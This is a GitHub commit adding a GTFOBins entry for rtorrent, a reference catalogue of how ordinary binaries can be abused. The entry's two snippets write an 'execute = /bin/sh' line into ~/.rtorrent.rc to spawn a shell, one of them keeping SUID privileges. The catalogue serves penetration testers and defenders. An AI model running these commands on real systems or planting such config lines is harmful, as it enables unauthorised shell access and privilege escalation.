Add rtorrent

This commit is contained in:
Andrea Cardaci 2022-12-16 13:21:14 +01:00 committed by GitHub
commit 2a12cf1268
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

11
_gtfobins/rtorrent.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
shell:
- code: |
echo "execute = /bin/sh,-c,\"/bin/sh <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
rtorrent
suid:
- code: |
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
./rtorrent
---